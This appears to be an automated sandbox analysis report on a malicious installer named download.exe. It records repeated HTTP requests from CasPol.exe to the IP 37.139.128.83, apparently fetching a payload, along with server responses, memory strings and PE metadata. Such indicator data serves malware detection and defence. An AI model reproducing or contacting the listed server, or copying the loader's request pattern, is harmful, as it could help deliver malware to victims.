          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:31 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:41 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:23:51 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:01 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:11 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 12:24:22 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33Vary: accept-language,accept-charsetAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: unknownTCP traffic detected without corresponding DNS query: 37.139.128.83
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2$2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2-2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/262hk
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2Data
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2M
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2R2
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2W7
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2e
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2gsLMEM8
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/2k
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.139.128.83/l
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: lang-1032.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: download.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: download.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: lang-1032.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: download.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: download.exeString found in binary or memory: http://s.symcd.com06
          Source: download.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: download.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: download.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: lang-1032.dll.2.drString found in binary or memory: http://www.avast.com0/
          Source: lang-1032.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: download.exeString found in binary or memory: https://d.symcb.com/cps0%
          Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0
          Source: download.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: lang-1032.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 37.139.128.83Cache-Control: no-cache
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004051E2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: download.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
